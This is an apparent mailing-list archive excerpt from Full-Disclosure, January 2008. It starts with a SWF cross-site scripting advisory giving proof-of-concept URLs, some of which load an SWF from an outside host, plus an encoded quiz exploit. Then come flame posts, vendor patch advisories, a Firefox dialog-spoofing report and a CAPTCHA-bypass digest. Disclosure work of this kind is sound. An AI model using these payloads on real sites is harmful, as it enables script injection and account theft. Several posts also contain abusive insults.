We were unable to perform an exhaustive review of all authoring tools that generate SWFs. More XSS issues may exist in the products listed below and certainly exist in other applications that save to SWF. We are only reporting XSS vulnerabilities that have been fixed by the vendors. There are more products vulnerable. We will publish more information when the vendor releases fixes.

Adobe Dreamweaver

The "skinName" parameter is accepted by all Flash files produced by the "Insert Flash Video" feature. "skinName" can be used to force victims to load arbitrary URLs including the "asfunction" protocol handler:

http://www.example.com/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//

Adobe was contacted on August 8, 2007. This issue was fixed in the December Flash player release.

Adobe Acrobat Connect/Macromedia Dreamweaver

"main.swf" is the controller file in all Connect/Breeze online presentations. This SWF does not properly validate the "baseurl" parameter, thus causing script injection:

http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//

Adobe was contacted on July 31, 2007. This issue was fixed in the December Flash player release.
InfoSoft FusionCharts

One of the issues found in FusionCharts was that the "dataURL" parameter allows insertion of arbitrary HTML into a "TextArea" instance. This allows attackers to load SWFs from other domains:

http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//cannings.org/DoKnowEvil.swf%3F.jpg%22%3E

InfoSoft was contacted on September 2, 2007. Fixes for all issues we found were released in late September. Webmasters should consult InfoSoft to properly upgrade their SWFs. See "The Fix" for details.

Techsmith Camtasia

One of the issues found in Camtasia was that the "csPreloader" parameter loads an arbitrary flash file:

http://www.example.com/Example_controller.swf?csPreloader=http://cannings.org/DoKnowEvil.swf%3f

Techsmith was contacted on August 12, 2007. Fixes for all issues were released in late September. Webmasters should contact Techsmith to properly upgrade their SWFs. See "The Fix" for details.

Autodemo

Autodemo is a service provider, not an authoring tool. However, like authoring tools they use a common control file in many demos. The "onend" parameter in "control.swf" loads arbitrary URLs including the JavaScript protocol handler:

http://www.example.com/control.swf?onend=javascript:alert(1)//

Autodemo was contacted on August 17, 2007. Autodemo was extremely responsive to our report and quickly fixed the issue in early September. Webmasters must update to the latest "control.swf". See "The Fix" for details.

Autodemo is not the only service provider to have XSS in their products. They are just the only service provider we looked at. Readers should be concerned about other service providers who don't even know their SWFs are vulnerable.

THE FIX

See http://docs.google.com/Doc?docid=ajfxntc4dmsq_14dt57ssdw.

CREDITS

First and foremost, we thank Stefano Di Paola of Minded Security and Obscure of EyeonSecurity who thoroughly researched and pioneered every attack we used.
Thanks to Autodemo, Infosoft, and Techsmith for quickly fixing this issue. We also thank the Computer Emergency Response Team for coordinating with the vendors to fix this issue, the Adobe Flash player development teams for including some fixes in the player (we hope to see more in the future), the Adobe Software Security Engineering Team, and the Google Security Team for giving me time to pursue this research and coauthor a book.

QUIZ

Given the ActionScript:

    /*
     * Quiz app
     *
     * To compile:
     * mtasc -swf Quiz.swf -main -header 10:10:10 Quiz.as
     */
    class Quiz {
        static function main(mc) {
            getURL("javascript:someFunction('" + escape(_root.userDefined) + "')");
        }
    }

Question

Create a URL for Firefox, Internet Explorer, and Safari that will execute JavaScript in the domain hosting Quiz.swf.

Answer (in base64)

aHR0cDovL2V4YW1wbGUuY29tL1F1aXouc3dmP3VzZXJEZWZpbmVkPS
cpO2Z1bmN0aW9uJTIwc29tZUZ1bmN0aW9uKGEpe31hbGVydCgxKS8v

From lyalc at swiftdsl.com.au Wed Jan 2 20:59:36 2008
From: lyalc at swiftdsl.com.au (Lyal Collins)
Date: Thu, 3 Jan 2008 06:59:36 +1000
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
In-Reply-To: <6d456c360801021205v3ff661c7x8caeffc494b71464@mail.gmail.com>
Message-ID: <004e01c84d82$62194690$0203a8c0@kpllaptop>

I'd add to this that anyone who buys security consulting/pen test services et al solely on the basis of web site content is unlikely to get any worthwhile outcomes for their specific needs. No effective manager in any company/government I've seen is going to refer to a web site alone, or to bother finding obscure posts on a specialist mailing list that may or may not be relevant to their needs - they merely use web sites as a source of potential suppliers before interviewing them, and getting references.

Let's kill this pointless waste of inbox space, please.
lyalc

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Tremaine Lea
Sent: Thursday, 3 January 2008 6:05 AM
To: SecReview
Cc: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)

Regardless of whether your intentions are good or not in performing these reviews, one thing is crystal clear. In order to perform these reviews and have them accepted by those who would actually read and depend on them to a degree, you need to have established yourself as a credible source and have a good reputation.

With that in mind, I think the vast majority will continue to rely on word of mouth from peers, or well respected and long standing companies such as Gartner or even Dark Reading.

In my not so humble opinion, you will not establish yourself as a credible resource by engaging in petty disputes and mud slinging on FD. Worse, it becomes more and more apparent that this is essentially an attempt to drive interest to your blog. I don't believe any serious company would engage in the behaviour you have to date, so both your motives and your method are in question.

If you genuinely wish to be taken seriously and treated as a credible source of information about other security vendors, I'd consider starting again from scratch and develop a better method of attracting professional interest. The key is to attract the attention, not try and push your product down throats.

Another quick lesson: if a vendor doesn't provide you with information, the correct thing to do is simply note that you were unable to review their product or services, and why. To still attempt a review with seriously incomplete information and then give a low score is irresponsible at best.
--
Tremaine Lea
Network Security Consultant
Intrepid ACL
"Paranoia for hire"

On Jan 2, 2008 11:08 AM, SecReview wrote:
> Hi Adam,
>
> We've said this before and will say this again, this time to everyone.
>
> We would be more than happy to give your company (QuietMove) a
> "better" review if you'd enable us to do that. So far you haven't
> helped us to effectively review you at all. We tried to call you
> before our initial review, but never got hold of anyone. We also sent
> you an email before writing our second review, and you never responded
> to any of the questions in that email. If you'd like us to do a better
> review then provide us with the information that you think we will
> need to get the job done.
>
> Our current review is the product of your website, emails that you've
> posted to this and other forums, and your reaction to our first
> review. We haven't been able to find anything related to major
> accomplishments by you or by QuietMove, we haven't seen any sample
> reports, and we haven't received any answers to any questions about
> your methodologies for service execution and delivery. We even think
> that our current review might be too harsh, but can't change anything
> without more information.
>
> If you want us to change our review, we can do that again and we can
> do it in a non-biased way (regardless of all the rants and noise). We
> need you to tell us about your service delivery methodologies, your
> reporting methodologies, how you define specific service offerings,
> what markets you play in, and if possible sanitized sample reports. We
> won't publish any of that information directly, but we would use that
> to produce your next review.
>
> We want our reviews to accurately and truthfully reflect the quality
> and professionalism of the providers that we study. (In fact, if
> anyone has any suggestions as to how we could better "rank" security
> companies we'd be more than happy to listen and consider those
> suggestions.)
>
> Hope this helps. This will be our last email about QuietMove unless
> you request a redo of the current review. We will only redo the review
> if you are able to provide us with accurate information to help us get
> it done. We think that you should do it, because we think that you can
> score much better than an F+. (You're clearly not an idiot and you do
> have at least some experience.)
>
> -the end.
>
>
>
>
> Regards,
> The Secreview Team
> http://secreview.blogspot.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From 300baud at gmail.com Wed Jan 2 22:30:02 2008
From: 300baud at gmail.com (Line Noise)
Date: Wed, 2 Jan 2008 14:30:02 -0800
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: <25233.1199302350@turing-police.cc.vt.edu>
References: <452214.1315441199301228241.JavaMail.servlet@perfora> <25233.1199302350@turing-police.cc.vt.edu>
Message-ID: <739e7bb20801021430u15f292c2q9a8e3dde17660769@mail.gmail.com>

On Jan 2, 2008 11:32 AM, wrote:
> On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
>
> > OpenVMS is less than 40% Blissful...
>
> Obviously, it's migrated over the years. Back in the late 80's when it
> was at its most prevalent (and before it got 'Open' attached to it - we're
> talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
> Bliss32..

VMS was a fine and elegant system, written in Bliss, Coral, and Pascal. Yes, indeed, my children. Pascal. Much of the C code currently in OpenVMS replaces the Coral and Pascal. The Bliss is still about the same ratio.

Mmmm, Bliss32. Good memories, thanks.

--
It's Full Disclosure. Post the disclosure here, not on your website. You may not have a web site tomorrow.
From security at mandriva.com Wed Jan 2 23:30:28 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 02 Jan 2008 16:30:28 -0700
Subject: [Full-disclosure] [ MDVSA-2008:1 ] - Updated wireshark packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:1
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : wireshark
 Date    : January 2, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0
_______________________________________________________________________

 Problem Description:

 A number of vulnerabilities in the Wireshark program were found that could cause crashes, excessive looping, or arbitrary code execution. This update provides Wireshark 0.99.7 which is not vulnerable to these issues.

 An updated version of libsmi is also being provided, not because of security issues, but because this version of wireshark uses it instead of net-snmp for SNMP support.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6111
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6112
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6113
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6114
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6115
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6116
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6117
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6118
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6119
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6120
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6121
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6438
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6439
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6441
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6450
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6451
 http://www.wireshark.org/security/wnpa-sec-2007-03.html
_______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2007.0:
_______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.
 You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From reepex at gmail.com Wed Jan 2 23:41:03 2008
From: reepex at gmail.com (reepex)
Date: Wed, 2 Jan 2008 17:41:03 -0600
Subject: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]
In-Reply-To: <20080102164630.F3980118039@mailserver5.hushmail.com>
References: <20080102164630.F3980118039@mailserver5.hushmail.com>
Message-ID:

So you included me in here because my name has something to do with farm equipment? Did your message have a point? You wrote a bunch of nonsense flattering your favorite security stars and then attempted to flame us with one-liners that did not make sense. It seems you are caught in between the serious posters (since you have no skill, you cannot post anything useful) and the trolls (because you are not funny or convincing). My version of full disclosure is calling out idiots with CISSPs and PhDs who post here and think their XSS and earth-shattering barrages of 0x41's make them security experts.

On Jan 2, 2008 10:46 AM, <31415926 at hush.ai> wrote:
> Critical Vulnerability in [Full-Disclosure]
>
> The problem with full disclosure is that everyone feels the need to
> fully disclose, even when their opinion and the information they
> are purporting to impart is, well, bollocks.
> You can't tell them to shut up as they think they're important and the internet gives them balls of steel and verbal diarrhoea, so we stumble from one tired flamewar to another with no useful content being published.
>
> It's embarrassing.
>
> I'm an advocate of FD as a concept. I believe that there is no such thing as an innocent on the internet and if you really are that dumb, then you deserve everything you get. FD (as one of many like-minded lists) forces the vendors to patch or die and eventually write quality code. FD (the concept, not the list) is the ultimate nuclear deterrent, without the mutually assured destruction lunacy.
>
> I have watched the posters to this list for some time. By far the vast majority are transparently kiddies, sitting on their painted-up laptops thinking of themselves as the techno-brats in the film "Hackers" and hoping to grow up to be like the guy in the film "Swordfish". They write in l33t5p34k and think that this somehow makes them informed. Kiddies are the lowest form of life in the hierarchy of information security and in the IT industry generally.
>
> You know who you are and so does everyone else. You are fools, and an embarrassment to the craft:
> Secreview (review of products/services you have never bought, are you the goatse.cz receiver?)
> Reepex (Isn't a reepex a bit of farm machinery?)
> Gobbles (A nickname for a gay male prostitute)
> Morning Wood (The holy grail of the viagra-abuser)
> Gmaggro ("high value target selection", are you completely cocking stupid?)
>
> Oh, the outrage.
>
> I can see it now. There will be armies of skiddies demanding that the l33tz hack this f at cker, spam him, pwn him, and post defamatory messages concerning her skills and possible employment opportunities for her and her mother everywhere possible. Guess what, kids? I don't care.
>
> No, not even a little bit.
> Do what you like, I could care less and no one else cares if you live or die tonight, you sad, acne'd little dewdrops.
>
> Calmed down yet?
>
> Good. I want you to consider something.
>
> The FD list consists of the following content (and what it has to say):
>
> Advisories by vendors (we fixed this)
> Advisories by individuals (I tested that and found this)
> Advisories by infosec organisations (we found this)
> Funnies (self explanatory)
> Opinions (this sucks, what about that?)
> Skids (I did this, aren't I great, everyone else sucks?)
> Trolls (you suck)
> Trawlers (I have something 0day to buy or sell)
>
> The top three (i.e. the useful content) are available in any one of a hundred places; the bottom three are noise. The only people interested in the noise are those who keep track of it for a living.
>
> So, consider that by posting anything in the bottom three categories, you are drawing the attention of those who take an interest in your sad efforts to destabilise the technical crutch of society. These people are better than you in every important way, and if you so much as tiptoe across one of their lines, you'll wind up sharing a cell with a 7ft gorilla called George with a dead mouse and a pressing need to dry-cornhole your ringpiece 3 times a night and twice on Sundays. Do yourselves a favour and STFU.
>
> What's left?
>
> The funnies and the opinions. I've laughed my tits off at posts by Messrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and I've been interested by a few others who will remain nameless as I can't list them all. Long live full disclosure, but keep in mind that you're only legends in your own bedrooms.
>
> later, pi
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From mailinglistsspam at gmail.com Thu Jan 3 00:24:04 2008
From: mailinglistsspam at gmail.com (list spam)
Date: Thu, 3 Jan 2008 11:24:04 +1100
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: <5e9ff4240801021615m4ef23594l7826e850caa69f2@mail.gmail.com>
References: <452214.1315441199301228241.JavaMail.servlet@perfora> <25233.1199302350@turing-police.cc.vt.edu> <5e9ff4240801021615m4ef23594l7826e850caa69f2@mail.gmail.com>
Message-ID: <5e9ff4240801021624y18b4ea17xca10d6d96b063c8c@mail.gmail.com>

W O R M S   A G A I N S T   N U C L E A R   K I L L E R S
Your System Has Been Officially WANKed

On Jan 3, 2008 6:32 AM, wrote:
> On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
>
> > OpenVMS is less than 40% Blissful...
>
> Obviously, it's migrated over the years. Back in the late 80's when it was at its most prevalent (and before it got 'Open' attached to it - we're talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily Bliss32..
>
> > Security relevance: UNHACKABLE!
>
> WANK! (The old-timers will know what that means, and it's not what you newbies think... ;)
From redhowlingwolves at bellsouth.net Thu Jan 3 03:55:15 2008
From: redhowlingwolves at bellsouth.net (scott)
Date: Wed, 02 Jan 2008 22:55:15 -0500
Subject: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]
In-Reply-To:
References: <20080102164630.F3980118039@mailserver5.hushmail.com>
Message-ID: <477C5CA3.7020508@bellsouth.net>

And your earth-shattering views are *SO* important, you must make sure everyone hears you. I think you just like to see your own posts. I'm filtering your posts from now on as they are nothing but from a wanna-be trying to play kids' games in a man's world. I shouldn't waste my time responding to a teeny-bopper, anyway.

Scott

reepex wrote:
> So you included me in here because my name has something to do with farm equipment? Did your message have a point?
>
> You wrote a bunch of nonsense flattering your favorite security stars and then attempted to flame us with one-liners that did not make sense. It seems you are caught in between the serious posters (since you have no skill, you cannot post anything useful) and the trolls (because you are not funny or convincing).
>
> My version of full disclosure is calling out idiots with CISSPs and PhDs who post here and think their XSS and earth-shattering barrages of 0x41's make them security experts.
>
> On Jan 2, 2008 10:46 AM, <31415926 at hush.ai> wrote:
>
>> Critical Vulnerability in [Full-Disclosure]
>>
>> The problem with full disclosure is that everyone feels the need to fully disclose, even when their opinion and the information they are purporting to impart is, well, bollocks.
- --
redhowlingwolves
From avivra at gmail.com Thu Jan 3 06:12:06 2008
From: avivra at gmail.com (avivra)
Date: Thu, 3 Jan 2008 08:12:06 +0200
Subject: [Full-disclosure] Yet another Dialog Spoofing Vulnerability - Firefox Basic Authentication
Message-ID: <001601c84dcf$92085dd0$b6191970$@com>

Summary

Mozilla Firefox allows spoofing the information presented in the basic authentication dialog box. This can allow an attacker to conduct phishing attacks, by tricking the user to believe that the authentication dialog box is from a trusted website.

Affected versions

Mozilla Firefox v2.0.0.11. Prior versions and other Mozilla products may also be affected.

http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthentication.aspx

From lcamtuf at dione.cc Thu Jan 3 10:48:21 2008
From: lcamtuf at dione.cc (Michal Zalewski)
Date: Thu, 3 Jan 2008 11:48:21 +0100 (CET)
Subject: [Full-disclosure] Yet another Dialog Spoofing Vulnerability - Firefox Basic Authentication
In-Reply-To: <001601c84dcf$92085dd0$b6191970$@com>
References: <001601c84dcf$92085dd0$b6191970$@com>
Message-ID:

On Thu, 3 Jan 2008, avivra wrote:

> http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthentication.aspx

Although it's amusing Firefox filters '"' in this prompt to begin with, rather than designing it more wisely not to render attacker-controlled text inline (use a table view below instead!), I'm not sure that the ability to use single quotes (or other homoglyphs) makes the attack considerably more dangerous. Note that any person familiar with the dialog is unlikely to be confused by this prompt, as a clear indication of the originating site, consistent with the design of this dialog, is preserved ("...at http://avivraff.com").
As such, I would certainly not go as far as recommending "not to provide username and password to web sites which show this dialog" - that's overkill. Just don't trust self-contradictory or unusually structured dialogs - you never should.

Naturally, any person *not* used to seeing this dialog might be eager to enter his credentials there, lulled by the tech lingo - but that's a general complaint about browser design that is in no way specific to Firefox; the same person would be likely to give out his password to:

prompt("Please enter your password for foocorp.com (certified by Verisign)")

...simply because of a systemic failure of browser vendors to provide user-friendly security signaling and UI behavior (along the lines of: "as far as we're concerned, any person with no understanding of SSL, HTTP, and DNS had it coming and should die in a fire").

Just my $.02 (and with the exchange rates today, that's not a whole lot!),
/mz

From brutealmighty at hushmail.com Thu Jan 3 12:07:21 2008
From: brutealmighty at hushmail.com (brutealmighty at hushmail.com)
Date: Thu, 03 Jan 2008 13:07:21 +0100
Subject: [Full-disclosure] King Kong plays the banjo
Message-ID: <20080103120722.21D3411803A@mailserver5.hushmail.com>

Happy new year!

SHA256:
70fdb783515753bad4c2cd4ccf3ff886299378469c862d710c6b0791698de5c4 - tgz
8000fd7f9d8bfb23d8a5e97248dec458c74578eafee2ea5b644bfa15e267e5d5 - rb
c3481cf8015dfc14bdf7be7dfe8d371bff1a44a713f01c63f21f824e22043bb9 - decrypted
36edaaa545d38764bf7a774f2f4d6f870c42c67d0259f19edbdc1542e995d948 - message below...
From avivra at gmail.com Thu Jan 3 13:34:54 2008
From: avivra at gmail.com (avivra)
Date: Thu, 3 Jan 2008 15:34:54 +0200
Subject: [Full-disclosure] Yet another Dialog Spoofing Vulnerability - Firefox Basic Authentication
In-Reply-To:
References: <001601c84dcf$92085dd0$b6191970$@com>
Message-ID: <8beca820801030534h722d7d51sf749cf24ebc1b50a@mail.gmail.com>

On Jan 3, 2008 12:48 PM, Michal Zalewski wrote:
> Note that any person familiar with the dialog is unlikely to be confused by this prompt, as a clear indication of the originating site, consistent with the design of this dialog, is preserved ("...at http://avivraff.com").
Might be, if the domain indication was more clear, and not at the end of the attacker-controlled text.

> As such, I would certainly not go as far as recommending "not to provide username and password to web sites which show this dialog" - that's overkill. Just don't trust self-contradictory or unusually structured dialogs - you never should.

I think regular users would find it difficult to distinguish between a normal dialog and an unusually structured dialog.

> Naturally, any person *not* used to seeing this dialog might be eager to enter his credentials there, lulled by the tech lingo - but that's a general complaint about browser design that is in no way specific to Firefox; the same person would be likely to give out his password to:
>
> prompt("Please enter your password for foocorp.com (certified by Verisign)")
>
> ...simply because of a systemic failure of browser vendors to provide user-friendly security signaling and UI behavior (along the lines of: "as far as we're concerned, any person with no understanding of SSL, HTTP, and DNS had it coming and should die in a fire").

Actually, the prompt is not a good example, as Firefox does show the originating domain in the title, and IE7 disables prompt by default. Though, I do agree that there are people out there that will be fooled by this too.

--Aviv.

From damncon at gmail.com Thu Jan 3 15:54:22 2008
From: damncon at gmail.com (damncon)
Date: Thu, 3 Jan 2008 12:54:22 -0300
Subject: [Full-disclosure] Uber Lamer Ass of the Year. Vote!
In-Reply-To: <67ea64530801021302s4b004496k9667bf86708fde45@mail.gmail.com>
References: <5c9b0ff50712221426u3e2d6b39y6ba8696e6491af27@mail.gmail.com> <90865ed50712232059s27a419b3j33ae8857bcfa70e0@mail.gmail.com> <67ea64530801021302s4b004496k9667bf86708fde45@mail.gmail.com>
Message-ID: <90865ed50801030754w14f327fcq7fad47902fac5821@mail.gmail.com>

Is this your mature and worried response about your personal abilities? n3td3v can-not-code.
> We talk about things your mom wouldn't approve of and I'm not letting you sign up, na na na.

btw I'm already signed in lulz

From jmm at debian.org Thu Jan 3 18:50:10 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Thu, 3 Jan 2008 19:50:10 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1443-1] New tcpreen packages fix denial of service
Message-ID: <20080103185010.GA4402@galadriel.inutil.org>

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1443-1                   security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
January 03, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : tcpreen
Vulnerability  : buffer overflows
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-6562

It was discovered that several buffer overflows in tcpreen, a tool for monitoring a TCP connection, may lead to denial of service.

For the stable distribution (etch), this problem has been fixed in version 1.4.3-0.1etch1.

The old stable distribution (sarge) doesn't contain tcpreen.

For the unstable distribution (sid), this problem has been fixed in version 1.4.3-0.3.

We recommend that you upgrade your tcpreen package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From 3APA3A at SECURITY.NNOV.RU Thu Jan 3 19:53:27 2008
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Thu, 3 Jan 2008 22:53:27 +0300
Subject: [Full-disclosure] multiple CAPTCHA automation test bypass digest
Message-ID: <1842083797.20080103225327@SECURITY.NNOV.RU>

Dear bugtraq,

Below is a digest of vulnerabilities in multiple CAPTCHA systems. All vulnerabilities were reported by MustLive (websecurity.com.ua) during "The Month of Bugs in CAPTCHA".

1. Peter's Custom Anti-Spam Image < 2.9 (Wordpress plugin)

1.1 "antiselect" value can be guessed with 10% probability.
1.2 Same check pairs may be used for multiple postings.

According to the vendor, both problems were addressed in Version 2.9.0 on August 11, 2007.

Original article: http://websecurity.com.ua/1501/
Exploit for 1.2: http://websecurity.com.ua/uploads/2007/MoBiC/Peter's%20Custom%20Anti-Spam%20Image%20CAPTCHA%20bypass.html

2. mt-scode CAPTCHA (plugin for Movable Type and Drupal)

Same check pairs may be used for multiple postings.

Original article: http://websecurity.com.ua/1516/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/mt-scode%20CAPTCHA%20bypass.html

3. PHP-Nuke <= 8.1

3.1 Same check pairs may be used for multiple postings/registrations.

Original article: http://websecurity.com.ua/1527/
Exploit:
http://websecurity.com.ua/uploads/2007/MoBiC/PHP-Nuke%20CAPTCHA%20bypass.html (posting)
http://websecurity.com.ua/uploads/2007/MoBiC/PHP-Nuke%20CAPTCHA%20bypass2.html (registration)

3.2 NULL string CAPTCHA bypass: if a NULL string is given, the CAPTCHA is not validated.

Original article: http://websecurity.com.ua/1528/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/PHP-Nuke%20CAPTCHA%20bypass3.html

4. Peter's Random Anti-Spam Image <= 0.2.4 (Wordpress plugin)

CAPTCHA may be bypassed by pre-generating possible image-code pairs.

Original article: http://websecurity.com.ua/1534/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/Peter's%20Random%20Anti-Spam%20Image%20CAPTCHA%20bypass.html

5. Cryptographp <= 1.12 (Wordpress plugin)

It's possible to reuse the same security code during a session.

Original article: http://websecurity.com.ua/1551/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/Cryptographp%20CAPTCHA%20bypass.html

6. PHP-Fusion / HBH-Fusion (version not reported) CAPTCHA bypass

It's possible to reuse the same security code during a session.

Original article:
http://websecurity.com.ua/1558/ (PHP-Fusion)
http://websecurity.com.ua/1561/ (HBH-Fusion)
Exploit:
http://websecurity.com.ua/uploads/2007/MoBiC/PHP-Fusion%20CAPTCHA%20bypass.html (PHP-Fusion)
http://websecurity.com.ua/uploads/2007/MoBiC/HBH-Fusion%20CAPTCHA%20bypass.txt (HBH-Fusion)

7. Nucleus <= 3.01 CAPTCHA bypass

7.1 CAPTCHA may be bypassed by pre-generating possible image-code pairs.
7.2 SQL injection vulnerability can be used to bypass CAPTCHA.

Original article:
(7.1) http://websecurity.com.ua/1564/
(7.2) http://websecurity.com.ua/1565/
Exploit:
(7.1) http://websecurity.com.ua/uploads/2007/MoBiC/Nucleus%20CAPTCHA%20bypass.html
(7.2) http://websecurity.com.ua/uploads/2007/MoBiC/Nucleus%20CAPTCHA%20bypass2.html

8. Auto-Input Protection (AIP) <= 2.0 (for ASP.Net)

Same check pairs may be used for multiple postings.

Original article: http://websecurity.com.ua/1568/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/AIP%20CAPTCHA%20bypass.html
Vendor's suggested workaround: http://davesexton.com/blog/blogs/blog/archive/2007/12/12/aip-1-0-0-bypassed.aspx

9. Math Comment Spam Protection <= 2.1 (Wordpress plugin)

Same check pairs may be used for multiple postings.

Original article: http://websecurity.com.ua/1575/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/Math%20Comment%20Spam%20Protection%20CAPTCHA%20bypass.html

10. Anti Spam Image <= 0.5 (Wordpress plugin)

It's possible to reuse the same security code during a session.

Original article: http://websecurity.com.ua/1584/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/Anti%20Spam%20Image%20CAPTCHA%20bypass.html

11. Captcha! <= 2.5d (Wordpress plugin)

It's possible to bypass the CAPTCHA by combining a cross-site request forgery vulnerability with a NULL string for the security code.

Original article: http://websecurity.com.ua/1587/
Exploit:
http://websecurity.com.ua/uploads/2007/MoBiC/Captcha!%20CSRF.html (cross-site request forgery)
http://websecurity.com.ua/uploads/2007/MoBiC/Captcha!%20CAPTCHA%20bypass.html (CAPTCHA bypass)

12. WP-ContactForm <= 2.0.7 (Wordpress plugin)

The same security code may be used multiple times.

Original article: http://websecurity.com.ua/1599/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CAPTCHA%20bypass.html

13. Drupal (reCaptcha)

A unique captcha_token parameter without recaptcha_response_field may be used to bypass CAPTCHA. The vulnerability is reported in the reCaptcha plugin for Drupal, but according to the reCaptcha developers, the vulnerability is in Drupal code.

Original article: http://websecurity.com.ua/1505/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/reCaptcha.txt

--
http://securityvulns.com/
ZARAZA U 3APA3A
You know my name - look up my number (The Beatles)

From jmm at debian.org Thu Jan 3 20:25:59 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Thu, 3 Jan 2008 21:25:59 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1444-1] New php5 packages fix several vulnerabilities
Message-ID: <20080103202559.GA6299@galadriel.inutil.org>

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1444-1                   security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
January 03, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : php5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3799 CVE-2007-3998 CVE-2007-4657 CVE-2007-4658 CVE-2007-4659 CVE-2007-4660 CVE-2007-4662 CVE-2007-5898 CVE-2007-5899

Several remote vulnerabilities have been discovered in PHP, a server-side, HTML-embedded scripting language. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-3799

    It was discovered that the session_start() function allowed the insertion of attributes into the session cookie.

CVE-2007-3998

    Mattias Bengtsson and Philip Olausson discovered that a programming error in the implementation of the wordwrap() function allowed denial of service through an infinite loop.

CVE-2007-4658

    Stanislav Malyshev discovered that a format string vulnerability in the money_format() function could allow the execution of arbitrary code.
CVE-2007-4659

